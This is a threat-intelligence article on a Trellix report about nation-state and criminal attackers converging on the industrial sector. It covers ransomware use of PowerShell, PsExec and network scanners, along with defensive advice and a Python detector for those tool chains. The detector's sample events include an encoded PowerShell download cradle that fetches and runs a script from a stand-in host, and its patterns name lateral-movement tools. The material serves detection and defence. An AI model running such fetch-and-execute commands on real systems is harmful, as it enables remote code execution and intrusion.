Nation-State and Financial Cybercrime Blur as Industrial Sector Becomes Top Target

Trellix Report: Nation-State Espionage and Financial Cybercrime Converge, with Industrial Sector as Primary Target

HIGH
October 25, 2025
5m read
Threat Intelligence, Threat Actor, Industrial Control Systems

Related Entities

Threat Actors

Organizations

Trellix

Products & Tech

PowerShell, PsExec, SoftPerfect Network Scanner

Full Report

Executive Summary

A new CyberThreat Report from Trellix for October 2025 indicates a blurring of lines between nation-state espionage and financially motivated cybercrime. Threat actors of all motivations are adopting similar, more sophisticated tactics, including the use of AI-powered malware, to increase the speed and scale of their attacks. The report, analyzing data from April to September 2025, identifies the industrial sector as the most heavily targeted, suffering 36.57% of all sector-based attacks. The research also confirms trends seen elsewhere: the United States is the most-attacked country, and the ransomware ecosystem is highly fragmented. A key technical finding is the overwhelming dominance of PowerShell as a tool in ransomware campaigns, featuring in over 77% of attacks.


Threat Overview

The convergence of TTPs (Tactics, Techniques, and Procedures) between state-sponsored groups and e-crime syndicates makes attribution more difficult and raises the overall threat level for all organizations. Nation-state actors may engage in financially motivated attacks to fund their operations, while criminal groups adopt stealthy, persistent techniques traditionally associated with espionage.

Key Trends:

  • Targeting: The industrial sector is the primary target (890 incidents), indicating a focus on critical infrastructure and manufacturing where disruption has high value.
  • Geography: The U.S. is the epicenter of attacks, with 1,285 victims (55% of total).
  • Ransomware Fragmentation: The market is not dominated by a single group. The top five gangs, including Qilin, are responsible for less than 40% of attacks, indicating a diverse and competitive criminal ecosystem.
  • AI in Attacks: The report notes the emergence of AI-powered malware, suggesting attackers are using AI for tasks like crafting more convincing phishing emails, identifying vulnerabilities, or creating polymorphic malware that evades signature-based detection.

Technical Analysis

The report provides specific data on the tools used in ransomware campaigns, highlighting the prevalence of "Living off the Land" techniques.

  • Execution: T1059.001 (Command and Scripting Interpreter: PowerShell) was the tool of choice in 77.7% of campaigns for script execution and payload delivery.
  • Lateral Movement: T1570 (Lateral Tool Transfer) using PsExec was observed in 66.5% of attacks to move between systems. PsExec's remote execution also maps to T1569.002 (System Services: Service Execution): the PSEXESVC service it installs on the target, recorded as a service-install event (System log Event ID 7045), is one of its most reliable artifacts.
  • Discovery: SoftPerfect Network Scanner (netscan.exe), a legitimate commercial product, was used for network reconnaissance in 54.2% of cases.
  • Command Execution: Built-in net commands (net user, net group, net localgroup) were used in 70.2% of attacks for tasks like user creation and privilege checks.

This data reinforces the need for defenders to focus on monitoring the usage of legitimate system tools, not just looking for known malware.

Impact Assessment

The focus on the industrial sector is particularly concerning due to the potential for physical consequences. A successful attack on an industrial control system (ICS) environment could lead to production shutdowns, equipment damage, environmental incidents, or even risks to human safety. The convergence of espionage and financial crime means that an attack that initially appears to be financially motivated could have a secondary objective of stealing intellectual property or establishing long-term persistence for future disruption.

Detection & Response

  • Behavioral Monitoring: Given the heavy use of legitimate tools, detection must be behavior-based. Monitor for chains of activity, such as a PowerShell script leading to the use of PsExec, followed by network scanning. This is where D3FEND User Behavior Analysis becomes critical.
  • PowerShell Logging: Enable and ingest PowerShell Script Block Logging (Event ID 4104) and Module Logging (Event ID 4103) from the Microsoft-Windows-PowerShell/Operational log. Script Block Logging records script text as the engine actually executes it, so -EncodedCommand payloads and other obfuscation are captured de-obfuscated, and fileless activity leaves a record even when nothing is written to disk. Module Logging is verbose, so tune it before sending it to the SIEM.
  • Threat Hunting: Proactively hunt for the use of tools like PsExec and SoftPerfect Network Scanner in your environment. Establish baselines for legitimate administrative use and investigate any deviations.
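The behavioral chain described in the bullets above, as an added example that is not part of the Trellix report or this article: a small Python detector run over constructed Windows event records (Security 4688 process creation, PowerShell/Operational 4104 script blocks, System 7045 service installs). Host names, paths, timestamps and the encoded command are invented. The stage order, the time window and the set of baselined admin hosts are parameters rather than constants, because in practice scanning often precedes lateral movement and approved jump hosts running the same tools should not page anyone.

```python
"""Behavior-chain detection over constructed Windows events (added example, not
from the Trellix report or the article). Flags a host where PowerShell, PsExec and
SoftPerfect Network Scanner appear in order within a window. All data is invented."""
import base64
import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Iterable, Optional


@dataclass(frozen=True)
class Event:
    host: str
    time: datetime
    event_id: int  # 4688 process creation, 4104 script block, 7045 service installed
    text: str      # CommandLine, ScriptBlockText or ServiceFileName respectively

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent/invalid."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify(ev: Event) -> Optional[str]:
    """Map a raw event to a chain stage; None means not relevant to this chain."""
    text = ev.text.lower()
    if ev.event_id == 7045 and "psexesvc" in text:
        return "psexec"        # service PsExec installs on the remote target
    if ev.event_id == 4104:
        return "powershell"    # script block logging records fileless code too
    if ev.event_id == 4688:
        if "psexec" in text:
            return "psexec"
        if "netscan" in text:  # SoftPerfect Network Scanner binary name
            return "netscan"
        if "powershell" in text or "pwsh" in text:
            return "powershell"
    return None

def find_chains(events: Iterable[Event], order=("powershell", "psexec", "netscan"),
                window: timedelta = timedelta(minutes=30),
                baseline_hosts: frozenset = frozenset()) -> list:
    """One alert per host where every stage in `order` occurs in sequence within
    `window` of the first; activity on approved `baseline_hosts` is suppressed."""
    by_host: dict = {}
    for ev in sorted(events, key=lambda e: e.time):
        stage = classify(ev)
        if stage and ev.host not in baseline_hosts:
            by_host.setdefault(ev.host, []).append((stage, ev))
    alerts = []
    for host, staged in by_host.items():
        for i, (stage, start) in enumerate(staged):
            if stage != order[0]:
                continue
            matched = [start]
            for nxt, ev in staged[i + 1:]:
                if ev.time - start.time > window:
                    break
                if nxt == order[len(matched)]:
                    matched.append(ev)
                    if len(matched) == len(order):
                        break
            if len(matched) == len(order):
                decoded = [decode_encoded_command(e.text) for e in matched]
                alerts.append({"host": host,
                               "stages": [(s, e.time.isoformat()) for s, e in zip(order, matched)],
                               "decoded": [d for d in decoded if d]})
                break  # one alert per host is enough to open a triage ticket
    return alerts

def _b64ps(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode()

T0 = datetime(2025, 9, 3, 2, 14)  # constructed timestamp
SAMPLE_EVENTS = [  # constructed records, not real telemetry
    # WS-042: full chain, opened by an encoded download cradle
    Event("WS-042", T0, 4688, "powershell.exe -nop -w hidden -enc "
          + _b64ps("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a.ps1')")),
    Event("WS-042", T0 + timedelta(minutes=4), 7045, r"%SystemRoot%\PSEXESVC.exe"),
    Event("WS-042", T0 + timedelta(minutes=9), 4688, r"C:\Users\Public\netscan.exe /auto:hosts.xml"),
    # JUMP-01: identical tooling on an approved admin jump host
    Event("JUMP-01", T0, 4104, "Get-ADComputer -Filter *"),
    Event("JUMP-01", T0 + timedelta(minutes=2), 4688, r"C:\Tools\PsExec.exe \\WS-100 cmd"),
    Event("JUMP-01", T0 + timedelta(minutes=3), 4688, r"C:\Tools\netscan.exe"),
    # WS-077: the scan comes hours after PsExec, outside the window
    Event("WS-077", T0, 4104, "Get-Process"),
    Event("WS-077", T0 + timedelta(minutes=1), 4688, r"C:\Windows\Temp\psexec.exe -s cmd"),
    Event("WS-077", T0 + timedelta(hours=3), 4688, r"C:\Windows\Temp\netscan.exe"),
]

def run_sample() -> list:
    return find_chains(SAMPLE_EVENTS, baseline_hosts=frozenset({"JUMP-01"}))
```

Calling run_sample() returns a single alert for WS-042, with the decoded download cradle attached for triage; the jump host is suppressed by the baseline and WS-077 never completes the chain inside the window. Dropping the baseline argument makes JUMP-01 alert too, which is exactly the noise the text tells you to baseline away, and passing a different `order` lets you express the scan-then-move sequence seen in many real intrusions. In production the same logic sits over a SIEM query grouped by host rather than an in-memory list.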

Mitigation

  1. Harden PowerShell: Use application control (e.g., AppLocker or WDAC) to restrict which interpreters and scripts may run. Under such a policy PowerShell places untrusted scripts in Constrained Language Mode, which blocks the .NET, COM and Add-Type calls most offensive tooling depends on, while scripts the policy trusts (signed or allowlisted) still run in Full Language mode for administrators. Constrained Language Mode is only a security boundary when enforced this way; setting it through the __PSLockdownPolicy environment variable alone is trivially bypassed. Also disable the legacy Windows PowerShell 2.0 engine, which attackers invoke specifically to evade script block logging.
  2. Secure Privileged Accounts: Strictly control access to administrative accounts. Implement Privileged Access Management (PAM) solutions to vault credentials and monitor privileged sessions.
  3. Network Segmentation: For the industrial sector, robust segmentation between the IT and OT (Operational Technology) networks is non-negotiable. Use a DMZ to broker all communication and prevent direct access from the less-secure IT environment to the critical OT environment.
  4. Layered Security: Implement a defense-in-depth strategy that includes endpoint protection (EPP), endpoint detection and response (EDR), network security, and robust backup and recovery systems.

Timeline of Events

  1. October 25, 2025: This article was published.

MITRE ATT&CK Mitigations

  • Use application control to restrict the use of PowerShell and other potentially abused administrative tools.
  • Separate IT and OT networks, which is crucial for the industrial sector, so that an intrusion on the IT side cannot cross into the OT environment.
  • Use EDR solutions to detect malicious behaviors and chains of activity, even when legitimate tools are used.

Article Author

Jason Gomes

• Cybersecurity Practitioner

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.

Threat Intelligence & Analysis, Security Orchestration (SOAR/XSOAR), Incident Response & Digital Forensics, Security Operations Center (SOC), SIEM & Security Analytics, Cyber Fusion & Threat Sharing, Security Automation & Integration, Managed Detection & Response (MDR)

Tags

Threat Intelligence, Trellix, APT, Cybercrime, Industrial Sector, ICS, PowerShell
